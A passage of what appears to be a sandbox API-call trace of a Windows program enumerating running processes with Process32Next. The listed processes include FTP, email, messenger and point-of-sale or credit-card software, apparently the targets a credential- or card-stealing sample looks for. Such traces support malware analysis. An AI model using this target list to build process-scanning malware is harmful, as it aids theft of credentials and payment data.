hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.894] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.896] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.899] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.963] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.965] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.966] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.968] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0238.969] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0238.971] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0238.972] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.974] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.975] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0238.976] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0238.978] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0238.979] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0238.983] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.985] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0238.986] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0238.988] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0238.989] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0238.991] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0238.992] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0238.993] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0238.998] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0238.999] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0239.001] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0239.002] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0239.003] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0239.005] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0239.006] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0239.007] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0239.009] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0239.058] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0239.060] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0239.062] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0239.064] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0239.066] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0239.068] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0239.070] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0239.072] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0239.076] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0239.078] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0239.080] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0239.082] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0239.083] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0239.086] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0239.088] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0239.093] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0239.096] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0239.098] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0239.100] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0239.102] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0239.154] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0239.157] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0239.159] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0239.161] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0239.164] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0239.166] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0239.171] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0239.173] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0239.175] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0239.177] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0239.179] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0239.181] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0239.186] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0239.189] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0239.191] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0239.193] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0239.195] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0239.197] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0239.254] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0239.258] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0239.261] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0239.272] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0239.276] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0239.280] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0239.282] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0239.283] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0239.285] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0239.286] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0239.288] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0239.290] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0239.291] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, 